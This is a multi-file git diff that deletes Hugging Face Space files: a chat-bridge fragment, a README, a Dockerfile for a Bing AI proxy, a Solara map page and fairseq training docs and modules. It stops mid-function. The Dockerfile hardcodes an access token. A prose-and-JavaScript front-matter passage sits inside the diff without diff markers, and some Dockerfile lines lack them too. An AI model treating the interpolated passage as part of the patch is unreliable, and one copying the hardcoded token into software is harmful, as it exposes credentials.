-                for i in range(n_model):
-                    chat_string.append( f"【{str(models[i])} says】: {window_mutex[i][0]} " )
-                res = '\n\n---\n\n'.join(chat_string)
-                # # # # # # # # # # #
-                observe_window[0] = res
-
-        t_model = threading.Thread(target=mutex_manager, args=(window_mutex, observe_window), daemon=True)
-        t_model.start()
-
-        return_string_collect = []
-        while True:
-            worker_done = [h.done() for h in futures]
-            if all(worker_done):
-                executor.shutdown()
-                break
-            time.sleep(1)
-
-        for i, future in enumerate(futures): # wait and get
-            return_string_collect.append( f"【{str(models[i])} says】: {future.result()} " )
-
-        window_mutex[-1] = False # stop mutex thread
-        res = '\n\n---\n\n'.join(return_string_collect)
-        return res
-
-
-def predict(inputs, llm_kwargs, *args, **kwargs):
-    """
-    Send the query to the LLM and fetch the output as a stream.
-    Used for basic conversation.
-    inputs is the input for this query
-    top_p and temperature are internal tuning parameters of the LLM
-    history is the list of previous dialogue turns (note that for both inputs and history, content that is too long will trigger a token-overflow error)
-    chatbot is the dialogue list shown in the WebUI; modify it and then yield it out to update the conversation UI directly
-    additional_fn indicates which button was clicked; see functional.py for the buttons
-    """
-
-    method = model_info[llm_kwargs['llm_model']]["fn_with_ui"]
-    yield from method(inputs, llm_kwargs, *args, **kwargs)
-
diff --git a/spaces/gagan3012/streamlit-tags/README.md b/spaces/gagan3012/streamlit-tags/README.md
deleted file mode 100644
index 5510a43e588f5948467bad493fc1b1c97ae25bfb..0000000000000000000000000000000000000000
--- a/spaces/gagan3012/streamlit-tags/README.md
+++ /dev/null
@@ -1,33 +0,0 @@
----
-title: Streamlit Tags
-emoji: 🐨
-colorFrom: pink
-colorTo: pink
-sdk: streamlit
-app_file: app.py
-pinned: false
----
-
-# Configuration
-
-`title`: _string_
-Display title for the Space
-
-`emoji`: _string_
-Space emoji (emoji-only character allowed)
-
-`colorFrom`: _string_
-Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray)
-
-`colorTo`: _string_
-Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray)
-
-`sdk`: _string_
-Can be either `gradio` or `streamlit`
-
-`app_file`: _string_
-Path to your main application file (which contains either `gradio` or `streamlit` Python code).
-Path is relative to the root of the repository.
-
-`pinned`: _boolean_
-Whether the Space stays on top of your list.
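The configuration keys documented above live in a flat `key: value` front-matter block between `---` delimiters. As a rough illustration (the helper below is our own sketch, not part of any Hugging Face or Streamlit API, and it only handles flat string values), they can be pulled out like this:

```javascript
// Hypothetical helper: extract the flat "key: value" pairs from a
// front-matter block delimited by "---" lines. Nested YAML is not handled.
function parseFrontMatter (text) {
  var lines = text.split('\n')
  if (lines.length === 0 || lines[0].trim() !== '---') return {}
  var config = {}
  for (var i = 1; i < lines.length; i++) {
    if (lines[i].trim() === '---') break // closing delimiter ends the block
    var idx = lines[i].indexOf(':')
    if (idx !== -1) {
      config[lines[i].slice(0, idx).trim()] = lines[i].slice(idx + 1).trim()
    }
  }
  return config
}

// Abridged version of the README above
var readme = '---\ntitle: Streamlit Tags\nsdk: streamlit\npinned: false\n---\n# Configuration'
console.log(parseFrontMatter(readme).sdk) // streamlit
```

A real Space would use a proper YAML parser instead; the sketch only shows why the `---` delimiters and `key: value` shape matter.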
diff --git a/spaces/galaxy001/biying/Dockerfile b/spaces/galaxy001/biying/Dockerfile
deleted file mode 100644
index 3698c7cb7938e025afc53b18a571ae2961fbdffe..0000000000000000000000000000000000000000
--- a/spaces/galaxy001/biying/Dockerfile
+++ /dev/null
@@ -1,34 +0,0 @@
-# Build Stage
-# Use golang:alpine as the base image for the build stage
-FROM golang:alpine AS builder

-# Add git so the project can be cloned from GitHub later
-RUN apk --no-cache add git

-# Clone the go-proxy-bingai project from GitHub into /workspace/app
-RUN git clone https://github.com/Harry-zklcdc/go-proxy-bingai.git /workspace/app

-# Set the working directory to the cloned project directory
-WORKDIR /workspace/app

-# Build the Go project. -ldflags="-s -w" reduces the size of the compiled binary
-RUN go build -ldflags="-s -w" -tags netgo -trimpath -o go-proxy-bingai main.go

-# Runtime Stage
-# Use the lightweight alpine image as the runtime base image
-FROM alpine

-# Set the working directory
-WORKDIR /workspace/app

-# Copy the compiled binary from the build stage into the runtime image
-COPY --from=builder /workspace/app/go-proxy-bingai .

-# Set an environment variable; the value here is a random string
-ENV Go_Proxy_BingAI_USER_TOKEN_1="kJs8hD92ncMzLaoQWYtX5rG6bE3fZ4iO"

-# Expose port 8080
-EXPOSE 8080

-# Command to run when the container starts
-CMD ["/workspace/app/go-proxy-bingai"]
\ No newline at end of file
diff --git a/spaces/giswqs/solara-demo/pages/05_maplibre.py b/spaces/giswqs/solara-demo/pages/05_maplibre.py
deleted file mode 100644
index 577229f3a5bca328993cc8cf980065c4e5e1ba68..0000000000000000000000000000000000000000
--- a/spaces/giswqs/solara-demo/pages/05_maplibre.py
+++ /dev/null
@@ -1,26 +0,0 @@
-
-import mapwidget.maplibre as mapwidget
-
-import solara
-
-zoom = solara.reactive(2)
-center = solara.reactive((20, 0))
-
-
-@solara.component
-def Page():
-    with solara.Column(style={"min-width": "500px", "height": "500px"}):
-        solara.Text("Not fully working yet. 
Try resizing the window to use the full width.") - - # solara components support reactive variables - solara.SliderInt(label="Zoom level", value=zoom, min=1, max=20) - # using 3rd party widget library require wiring up the events manually - # using zoom.value and zoom.set - mapwidget.Map.element( # type: ignore - zoom=zoom.value, - center=center.value, - height='600px', - width="100%" - ) - solara.Text(f"Zoom: {zoom.value}") - solara.Text(f"Center: {center.value}") diff --git a/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md b/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md deleted file mode 100644 index 241d604a3b31a37755da68aad6ff47d46891d3fc..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md +++ /dev/null @@ -1,74 +0,0 @@ -# Simultaneous Machine Translation - -This directory contains the code for the paper [Monotonic Multihead Attention](https://openreview.net/forum?id=Hyg96gBKPS) - -## Prepare Data - -[Please follow the instructions to download and preprocess the WMT'15 En-De dataset.](https://github.com/pytorch/fairseq/tree/simulastsharedtask/examples/translation#prepare-wmt14en2desh) - -Another example of training an English to Japanese model can be found [here](docs/enja.md) - -## Training - -- MMA-IL - -```shell -fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type infinite_lookback \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --latency-weight-avg 0.1 \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` - -- MMA-H - -```shell 
-fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type hard_aligned \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --latency-weight-var 0.1 \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` - -- wait-k - -```shell -fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type wait-k \ - --waitk-lagging 3 \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` diff --git a/spaces/gradio/HuBERT/fairseq/data/data_utils.py b/spaces/gradio/HuBERT/fairseq/data/data_utils.py deleted file mode 100644 index b3de57681e0fb6b026003eff19f7745caf6799d3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/data/data_utils.py +++ /dev/null @@ -1,595 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
-
-try:
-    from collections.abc import Iterable
-except ImportError:
-    from collections import Iterable
-import contextlib
-import itertools
-import logging
-import re
-import warnings
-from typing import Optional, Tuple
-
-import numpy as np
-import torch
-
-from fairseq.file_io import PathManager
-from fairseq import utils
-import os
-
-logger = logging.getLogger(__name__)
-
-
-def infer_language_pair(path):
-    """Infer language pair from filename: <split>.<lang1>-<lang2>.(...).idx"""
-    src, dst = None, None
-    for filename in PathManager.ls(path):
-        parts = filename.split(".")
-        if len(parts) >= 3 and len(parts[1].split("-")) == 2:
-            return parts[1].split("-")
-    return src, dst
-
-
-def collate_tokens(
-    values,
-    pad_idx,
-    eos_idx=None,
-    left_pad=False,
-    move_eos_to_beginning=False,
-    pad_to_length=None,
-    pad_to_multiple=1,
-    pad_to_bsz=None,
-):
-    """Convert a list of 1d tensors into a padded 2d tensor."""
-    size = max(v.size(0) for v in values)
-    size = size if pad_to_length is None else max(size, pad_to_length)
-    if pad_to_multiple != 1 and size % pad_to_multiple != 0:
-        size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
-
-    batch_size = len(values) if pad_to_bsz is None else max(len(values), pad_to_bsz)
-    res = values[0].new(batch_size, size).fill_(pad_idx)
-
-    def copy_tensor(src, dst):
-        assert dst.numel() == src.numel()
-        if move_eos_to_beginning:
-            if eos_idx is None:
-                # if no eos_idx is specified, then use the last token in src
-                dst[0] = src[-1]
-            else:
-                dst[0] = eos_idx
-            dst[1:] = src[:-1]
-        else:
-            dst.copy_(src)
-
-    for i, v in enumerate(values):
-        copy_tensor(v, res[i][size - len(v) :] if left_pad else res[i][: len(v)])
-    return res
-
-def load_indexed_dataset(
-    path, dictionary=None, dataset_impl=None, combine=False, default="cached"
-):
-    """A helper function for loading indexed datasets.
- - Args: - path (str): path to indexed dataset (e.g., 'data-bin/train') - dictionary (~fairseq.data.Dictionary): data dictionary - dataset_impl (str, optional): which dataset implementation to use. If - not provided, it will be inferred automatically. For legacy indexed - data we use the 'cached' implementation by default. - combine (bool, optional): automatically load and combine multiple - datasets. For example, if *path* is 'data-bin/train', then we will - combine 'data-bin/train', 'data-bin/train1', ... and return a - single ConcatDataset instance. - """ - import fairseq.data.indexed_dataset as indexed_dataset - from fairseq.data.concat_dataset import ConcatDataset - - datasets = [] - for k in itertools.count(): - path_k = path + (str(k) if k > 0 else "") - try: - path_k = indexed_dataset.get_indexed_dataset_to_local(path_k) - except Exception as e: - if "StorageException: [404] Path not found" in str(e): - logger.warning(f"path_k: {e} not found") - else: - raise e - - dataset_impl_k = dataset_impl - if dataset_impl_k is None: - dataset_impl_k = indexed_dataset.infer_dataset_impl(path_k) - dataset = indexed_dataset.make_dataset( - path_k, - impl=dataset_impl_k or default, - fix_lua_indexing=True, - dictionary=dictionary, - ) - if dataset is None: - break - logger.info("loaded {:,} examples from: {}".format(len(dataset), path_k)) - datasets.append(dataset) - if not combine: - break - if len(datasets) == 0: - return None - elif len(datasets) == 1: - return datasets[0] - else: - return ConcatDataset(datasets) - - -@contextlib.contextmanager -def numpy_seed(seed, *addl_seeds): - """Context manager which seeds the NumPy PRNG with the specified seed and - restores the state afterward""" - if seed is None: - yield - return - if len(addl_seeds) > 0: - seed = int(hash((seed, *addl_seeds)) % 1e6) - state = np.random.get_state() - np.random.seed(seed) - try: - yield - finally: - np.random.set_state(state) - - -def collect_filtered(function, iterable, filtered): - """ - 
Similar to :func:`filter` but collects filtered elements in ``filtered``. - - Args: - function (callable): function that returns ``False`` for elements that - should be filtered - iterable (iterable): iterable to filter - filtered (list): list to store filtered elements - """ - for el in iterable: - if function(el): - yield el - else: - filtered.append(el) - - -def _filter_by_size_dynamic(indices, size_fn, max_positions, raise_exception=False): - def compare_leq(a, b): - return a <= b if not isinstance(a, tuple) else max(a) <= b - - def check_size(idx): - if isinstance(max_positions, float) or isinstance(max_positions, int): - return size_fn(idx) <= max_positions - elif isinstance(max_positions, dict): - idx_size = size_fn(idx) - assert isinstance(idx_size, dict) - intersect_keys = set(max_positions.keys()) & set(idx_size.keys()) - return all( - all( - a is None or b is None or a <= b - for a, b in zip(idx_size[key], max_positions[key]) - ) - for key in intersect_keys - ) - else: - # For MultiCorpusSampledDataset, will generalize it later - if not isinstance(size_fn(idx), Iterable): - return all(size_fn(idx) <= b for b in max_positions) - return all( - a is None or b is None or a <= b - for a, b in zip(size_fn(idx), max_positions) - ) - - ignored = [] - itr = collect_filtered(check_size, indices, ignored) - indices = np.fromiter(itr, dtype=np.int64, count=-1) - return indices, ignored - - -def filter_by_size(indices, dataset, max_positions, raise_exception=False): - """ - [deprecated] Filter indices based on their size. - Use `FairseqDataset::filter_indices_by_size` instead. - - Args: - indices (List[int]): ordered list of dataset indices - dataset (FairseqDataset): fairseq dataset instance - max_positions (tuple): filter elements larger than this size. - Comparisons are done component-wise. - raise_exception (bool, optional): if ``True``, raise an exception if - any elements are filtered (default: False). 
- """ - warnings.warn( - "data_utils.filter_by_size is deprecated. " - "Use `FairseqDataset::filter_indices_by_size` instead.", - stacklevel=2, - ) - if isinstance(max_positions, float) or isinstance(max_positions, int): - if hasattr(dataset, "sizes") and isinstance(dataset.sizes, np.ndarray): - ignored = indices[dataset.sizes[indices] > max_positions].tolist() - indices = indices[dataset.sizes[indices] <= max_positions] - elif ( - hasattr(dataset, "sizes") - and isinstance(dataset.sizes, list) - and len(dataset.sizes) == 1 - ): - ignored = indices[dataset.sizes[0][indices] > max_positions].tolist() - indices = indices[dataset.sizes[0][indices] <= max_positions] - else: - indices, ignored = _filter_by_size_dynamic( - indices, dataset.size, max_positions - ) - else: - indices, ignored = _filter_by_size_dynamic(indices, dataset.size, max_positions) - - if len(ignored) > 0 and raise_exception: - raise Exception( - ( - "Size of sample #{} is invalid (={}) since max_positions={}, " - "skip this example with --skip-invalid-size-inputs-valid-test" - ).format(ignored[0], dataset.size(ignored[0]), max_positions) - ) - if len(ignored) > 0: - logger.warning( - ( - "{} samples have invalid sizes and will be skipped, " - "max_positions={}, first few sample ids={}" - ).format(len(ignored), max_positions, ignored[:10]) - ) - return indices - - -def filter_paired_dataset_indices_by_size(src_sizes, tgt_sizes, indices, max_sizes): - """Filter a list of sample indices. Remove those that are longer - than specified in max_sizes. 
- - Args: - indices (np.array): original array of sample indices - max_sizes (int or list[int] or tuple[int]): max sample size, - can be defined separately for src and tgt (then list or tuple) - - Returns: - np.array: filtered sample array - list: list of removed indices - """ - if max_sizes is None: - return indices, [] - if type(max_sizes) in (int, float): - max_src_size, max_tgt_size = max_sizes, max_sizes - else: - max_src_size, max_tgt_size = max_sizes - if tgt_sizes is None: - ignored = indices[src_sizes[indices] > max_src_size] - else: - ignored = indices[ - (src_sizes[indices] > max_src_size) | (tgt_sizes[indices] > max_tgt_size) - ] - if len(ignored) > 0: - if tgt_sizes is None: - indices = indices[src_sizes[indices] <= max_src_size] - else: - indices = indices[ - (src_sizes[indices] <= max_src_size) - & (tgt_sizes[indices] <= max_tgt_size) - ] - return indices, ignored.tolist() - - -def batch_by_size( - indices, - num_tokens_fn, - num_tokens_vec=None, - max_tokens=None, - max_sentences=None, - required_batch_size_multiple=1, - fixed_shapes=None, -): - """ - Yield mini-batches of indices bucketed by size. Batches may contain - sequences of different lengths. - - Args: - indices (List[int]): ordered list of dataset indices - num_tokens_fn (callable): function that returns the number of tokens at - a given index - num_tokens_vec (List[int], optional): precomputed vector of the number - of tokens for each index in indices (to enable faster batch generation) - max_tokens (int, optional): max number of tokens in each batch - (default: None). - max_sentences (int, optional): max number of sentences in each - batch (default: None). - required_batch_size_multiple (int, optional): require batch size to - be less than N or a multiple of N (default: 1). - fixed_shapes (List[Tuple[int, int]], optional): if given, batches will - only be created with the given shapes. *max_sentences* and - *required_batch_size_multiple* will be ignored (default: None). 
- """ - try: - from fairseq.data.data_utils_fast import ( - batch_by_size_fn, - batch_by_size_vec, - batch_fixed_shapes_fast, - ) - except ImportError: - raise ImportError( - "Please build Cython components with: " - "`python setup.py build_ext --inplace`" - ) - except ValueError: - raise ValueError( - "Please build (or rebuild) Cython components with `python setup.py build_ext --inplace`." - ) - - # added int() to avoid TypeError: an integer is required - max_tokens = ( - int(max_tokens) if max_tokens is not None else -1 - ) - max_sentences = max_sentences if max_sentences is not None else -1 - bsz_mult = required_batch_size_multiple - - if not isinstance(indices, np.ndarray): - indices = np.fromiter(indices, dtype=np.int64, count=-1) - - if num_tokens_vec is not None and not isinstance(num_tokens_vec, np.ndarray): - num_tokens_vec = np.fromiter(num_tokens_vec, dtype=np.int64, count=-1) - - if fixed_shapes is None: - if num_tokens_vec is None: - return batch_by_size_fn( - indices, - num_tokens_fn, - max_tokens, - max_sentences, - bsz_mult, - ) - else: - return batch_by_size_vec( - indices, - num_tokens_vec, - max_tokens, - max_sentences, - bsz_mult, - ) - - else: - fixed_shapes = np.array(fixed_shapes, dtype=np.int64) - sort_order = np.lexsort( - [ - fixed_shapes[:, 1].argsort(), # length - fixed_shapes[:, 0].argsort(), # bsz - ] - ) - fixed_shapes_sorted = fixed_shapes[sort_order] - return batch_fixed_shapes_fast(indices, num_tokens_fn, fixed_shapes_sorted) - - -def post_process(sentence: str, symbol: str): - if symbol == "sentencepiece": - sentence = sentence.replace(" ", "").replace("\u2581", " ").strip() - elif symbol == "wordpiece": - sentence = sentence.replace(" ", "").replace("_", " ").strip() - elif symbol == "letter": - sentence = sentence.replace(" ", "").replace("|", " ").strip() - elif symbol == "silence": - import re - sentence = sentence.replace("", "") - sentence = re.sub(' +', ' ', sentence).strip() - elif symbol == "_EOW": - sentence = 
sentence.replace(" ", "").replace("_EOW", " ").strip() - elif symbol in {"subword_nmt", "@@ ", "@@"}: - if symbol == "subword_nmt": - symbol = "@@ " - sentence = (sentence + " ").replace(symbol, "").rstrip() - elif symbol == "none": - pass - elif symbol is not None: - raise NotImplementedError(f"Unknown post_process option: {symbol}") - return sentence - - -def compute_mask_indices( - shape: Tuple[int, int], - padding_mask: Optional[torch.Tensor], - mask_prob: float, - mask_length: int, - mask_type: str = "static", - mask_other: float = 0.0, - min_masks: int = 0, - no_overlap: bool = False, - min_space: int = 0, -) -> np.ndarray: - """ - Computes random mask spans for a given shape - - Args: - shape: the the shape for which to compute masks. - should be of size 2 where first element is batch size and 2nd is timesteps - padding_mask: optional padding mask of the same size as shape, which will prevent masking padded elements - mask_prob: probability for each token to be chosen as start of the span to be masked. this will be multiplied by - number of timesteps divided by length of mask span to mask approximately this percentage of all elements. - however due to overlaps, the actual number will be smaller (unless no_overlap is True) - mask_type: how to compute mask lengths - static = fixed size - uniform = sample from uniform distribution [mask_other, mask_length*2] - normal = sample from normal distribution with mean mask_length and stdev mask_other. 
mask is min 1 element - poisson = sample from possion distribution with lambda = mask length - min_masks: minimum number of masked spans - no_overlap: if false, will switch to an alternative recursive algorithm that prevents spans from overlapping - min_space: only used if no_overlap is True, this is how many elements to keep unmasked between spans - """ - - bsz, all_sz = shape - mask = np.full((bsz, all_sz), False) - - all_num_mask = int( - # add a random number for probabilistic rounding - mask_prob * all_sz / float(mask_length) - + np.random.rand() - ) - - all_num_mask = max(min_masks, all_num_mask) - - mask_idcs = [] - for i in range(bsz): - if padding_mask is not None: - sz = all_sz - padding_mask[i].long().sum().item() - num_mask = int( - # add a random number for probabilistic rounding - mask_prob * sz / float(mask_length) - + np.random.rand() - ) - num_mask = max(min_masks, num_mask) - else: - sz = all_sz - num_mask = all_num_mask - - if mask_type == "static": - lengths = np.full(num_mask, mask_length) - elif mask_type == "uniform": - lengths = np.random.randint(mask_other, mask_length * 2 + 1, size=num_mask) - elif mask_type == "normal": - lengths = np.random.normal(mask_length, mask_other, size=num_mask) - lengths = [max(1, int(round(x))) for x in lengths] - elif mask_type == "poisson": - lengths = np.random.poisson(mask_length, size=num_mask) - lengths = [int(round(x)) for x in lengths] - else: - raise Exception("unknown mask selection " + mask_type) - - if sum(lengths) == 0: - lengths[0] = min(mask_length, sz - 1) - - if no_overlap: - mask_idc = [] - - def arrange(s, e, length, keep_length): - span_start = np.random.randint(s, e - length) - mask_idc.extend(span_start + i for i in range(length)) - - new_parts = [] - if span_start - s - min_space >= keep_length: - new_parts.append((s, span_start - min_space + 1)) - if e - span_start - keep_length - min_space > keep_length: - new_parts.append((span_start + length + min_space, e)) - return new_parts - - 
parts = [(0, sz)] - min_length = min(lengths) - for length in sorted(lengths, reverse=True): - lens = np.fromiter( - (e - s if e - s >= length + min_space else 0 for s, e in parts), - int, - ) - l_sum = np.sum(lens) - if l_sum == 0: - break - probs = lens / np.sum(lens) - c = np.random.choice(len(parts), p=probs) - s, e = parts.pop(c) - parts.extend(arrange(s, e, length, min_length)) - mask_idc = np.asarray(mask_idc) - else: - min_len = min(lengths) - if sz - min_len <= num_mask: - min_len = sz - num_mask - 1 - - mask_idc = np.random.choice(sz - min_len, num_mask, replace=False) - - mask_idc = np.asarray( - [ - mask_idc[j] + offset - for j in range(len(mask_idc)) - for offset in range(lengths[j]) - ] - ) - - mask_idcs.append(np.unique(mask_idc[mask_idc < sz])) - - min_len = min([len(m) for m in mask_idcs]) - for i, mask_idc in enumerate(mask_idcs): - if len(mask_idc) > min_len: - mask_idc = np.random.choice(mask_idc, min_len, replace=False) - mask[i, mask_idc] = True - - return mask - - -def get_mem_usage(): - try: - import psutil - - mb = 1024 * 1024 - return f"used={psutil.virtual_memory().used / mb}Mb; avail={psutil.virtual_memory().available / mb}Mb" - except ImportError: - return "N/A" - - -# lens: torch.LongTensor -# returns: torch.BoolTensor -def lengths_to_padding_mask(lens): - bsz, max_lens = lens.size(0), torch.max(lens).item() - mask = torch.arange(max_lens).to(lens.device).view(1, max_lens) - mask = mask.expand(bsz, -1) >= lens.view(bsz, 1).expand(-1, max_lens) - return mask - - -# lens: torch.LongTensor -# returns: torch.BoolTensor -def lengths_to_mask(lens): - return ~lengths_to_padding_mask(lens) - - -def get_buckets(sizes, num_buckets): - buckets = np.unique( - np.percentile( - sizes, - np.linspace(0, 100, num_buckets + 1), - interpolation='lower', - )[1:] - ) - return buckets - - -def get_bucketed_sizes(orig_sizes, buckets): - sizes = np.copy(orig_sizes) - assert np.min(sizes) >= 0 - start_val = -1 - for end_val in buckets: - mask = (sizes > 
start_val) & (sizes <= end_val) - sizes[mask] = end_val - start_val = end_val - return sizes - - - -def _find_extra_valid_paths(dataset_path: str) -> set: - paths = utils.split_paths(dataset_path) - all_valid_paths = set() - for sub_dir in paths: - contents = PathManager.ls(sub_dir) - valid_paths = [c for c in contents if re.match("valid*[0-9].*", c) is not None] - all_valid_paths |= {os.path.basename(p) for p in valid_paths} - # Remove .bin, .idx etc - roots = {os.path.splitext(p)[0] for p in all_valid_paths} - return roots - - -def raise_if_valid_subsets_unintentionally_ignored(train_cfg) -> None: - """Raises if there are paths matching 'valid*[0-9].*' which are not combined or ignored.""" - if ( - train_cfg.dataset.ignore_unused_valid_subsets - or train_cfg.dataset.combine_valid_subsets - or train_cfg.dataset.disable_validation - or not hasattr(train_cfg.task, "data") - ): - return - other_paths = _find_extra_valid_paths(train_cfg.task.data) - specified_subsets = train_cfg.dataset.valid_subset.split(",") - ignored_paths = [p for p in other_paths if p not in specified_subsets] - if ignored_paths: - advice = "Set --combine-val to combine them or --ignore-unused-valid-subsets to ignore them." - msg = f"Valid paths {ignored_paths} will be ignored. {advice}" - raise ValueError(msg) diff --git a/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py b/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py deleted file mode 100644 index 71134388889d7f224655957256e78fd6c02d72a3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py +++ /dev/null @@ -1,202 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
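The span-masking strategy documented in `compute_mask_indices` above can be illustrated with a stripped-down sketch covering only the `static` branch, with no padding or overlap handling. The helper name and defaults here are illustrative, not part of fairseq's API:

```python
import numpy as np

def simple_span_mask(bsz, tsz, mask_prob, mask_length, seed=0):
    """Minimal sketch of the 'static' branch: pick span starts at random,
    then mark mask_length consecutive timesteps per span."""
    rng = np.random.default_rng(seed)
    mask = np.full((bsz, tsz), False)
    # approximate number of spans so that ~mask_prob of timesteps are masked,
    # with a random term for probabilistic rounding (as in the original)
    num_spans = int(mask_prob * tsz / float(mask_length) + rng.random())
    for b in range(bsz):
        starts = rng.choice(tsz - mask_length, size=num_spans, replace=False)
        for s in starts:
            mask[b, s:s + mask_length] = True
    return mask

m = simple_span_mask(bsz=2, tsz=100, mask_prob=0.5, mask_length=10)
# overlapping spans make the realized ratio <= the target, as the docstring notes
print(m.shape, m.mean())
```

Because distinct span starts can still produce overlapping spans, the realized masking ratio is at most `mask_prob`, which is exactly the caveat stated in the docstring.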
- -import torch -import torch.nn as nn -import torch.nn.functional as F - - -class GumbelVectorQuantizer(nn.Module): - def __init__( - self, - dim, - num_vars, - temp, - groups, - combine_groups, - vq_dim, - time_first, - activation=nn.GELU(), - weight_proj_depth=1, - weight_proj_factor=1, - ): - """Vector quantization using gumbel softmax - - Args: - dim: input dimension (channels) - num_vars: number of quantized vectors per group - temp: temperature for training. this should be a tuple of 3 elements: (start, stop, decay factor) - groups: number of groups for vector quantization - combine_groups: whether to use the vectors for all groups - vq_dim: dimensionality of the resulting quantized vector - time_first: if true, expect input in BxTxC format, otherwise in BxCxT - activation: what activation to use (should be a module). this is only used if weight_proj_depth is > 1 - weight_proj_depth: number of layers (with activation in between) to project input before computing logits - weight_proj_factor: this is used only if weight_proj_depth is > 1. 
scales the inner dimensionality of - projections by this factor - """ - super().__init__() - - self.groups = groups - self.combine_groups = combine_groups - self.input_dim = dim - self.num_vars = num_vars - self.time_first = time_first - - assert ( - vq_dim % groups == 0 - ), f"dim {vq_dim} must be divisible by groups {groups} for concatenation" - - var_dim = vq_dim // groups - num_groups = groups if not combine_groups else 1 - - self.vars = nn.Parameter(torch.FloatTensor(1, num_groups * num_vars, var_dim)) - nn.init.uniform_(self.vars) - - if weight_proj_depth > 1: - - def block(input_dim, output_dim): - return nn.Sequential(nn.Linear(input_dim, output_dim), activation) - - inner_dim = self.input_dim * weight_proj_factor - self.weight_proj = nn.Sequential( - *[ - block(self.input_dim if i == 0 else inner_dim, inner_dim) - for i in range(weight_proj_depth - 1) - ], - nn.Linear(inner_dim, groups * num_vars), - ) - else: - self.weight_proj = nn.Linear(self.input_dim, groups * num_vars) - nn.init.normal_(self.weight_proj.weight, mean=0, std=1) - nn.init.zeros_(self.weight_proj.bias) - - if isinstance(temp, str): - import ast - temp = ast.literal_eval(temp) - assert len(temp) == 3, f"{temp}, {len(temp)}" - - self.max_temp, self.min_temp, self.temp_decay = temp - self.curr_temp = self.max_temp - self.codebook_indices = None - - def set_num_updates(self, num_updates): - self.curr_temp = max( - self.max_temp * self.temp_decay ** num_updates, self.min_temp - ) - - def get_codebook_indices(self): - if self.codebook_indices is None: - from itertools import product - - p = [range(self.num_vars)] * self.groups - inds = list(product(*p)) - self.codebook_indices = torch.tensor( - inds, dtype=torch.long, device=self.vars.device - ).flatten() - - if not self.combine_groups: - self.codebook_indices = self.codebook_indices.view( - self.num_vars ** self.groups, -1 - ) - for b in range(1, self.groups): - self.codebook_indices[:, b] += self.num_vars * b - self.codebook_indices = 
self.codebook_indices.flatten() - return self.codebook_indices - - def codebook(self): - indices = self.get_codebook_indices() - return ( - self.vars.squeeze(0) - .index_select(0, indices) - .view(self.num_vars ** self.groups, -1) - ) - - def sample_from_codebook(self, b, n): - indices = self.get_codebook_indices() - indices = indices.view(-1, self.groups) - cb_size = indices.size(0) - assert ( - n < cb_size - ), f"sample size {n} is greater than size of codebook {cb_size}" - sample_idx = torch.randint(low=0, high=cb_size, size=(b * n,)) - indices = indices[sample_idx] - - z = self.vars.squeeze(0).index_select(0, indices.flatten()).view(b, n, -1) - return z - - def to_codebook_index(self, indices): - res = indices.new_full(indices.shape[:-1], 0) - for i in range(self.groups): - exponent = self.groups - i - 1 - res += indices[..., i] * (self.num_vars ** exponent) - return res - - def forward_idx(self, x): - res = self.forward(x, produce_targets=True) - return res["x"], res["targets"] - - def forward(self, x, produce_targets=False): - - result = {"num_vars": self.num_vars * self.groups} - - if not self.time_first: - x = x.transpose(1, 2) - - bsz, tsz, fsz = x.shape - x = x.reshape(-1, fsz) - x = self.weight_proj(x) - x = x.view(bsz * tsz * self.groups, -1) - - _, k = x.max(-1) - hard_x = ( - x.new_zeros(*x.shape) - .scatter_(-1, k.view(-1, 1), 1.0) - .view(bsz * tsz, self.groups, -1) - ) - hard_probs = torch.mean(hard_x.float(), dim=0) - result["code_perplexity"] = torch.exp( - -torch.sum(hard_probs * torch.log(hard_probs + 1e-7), dim=-1) - ).sum() - - avg_probs = torch.softmax( - x.view(bsz * tsz, self.groups, -1).float(), dim=-1 - ).mean(dim=0) - result["prob_perplexity"] = torch.exp( - 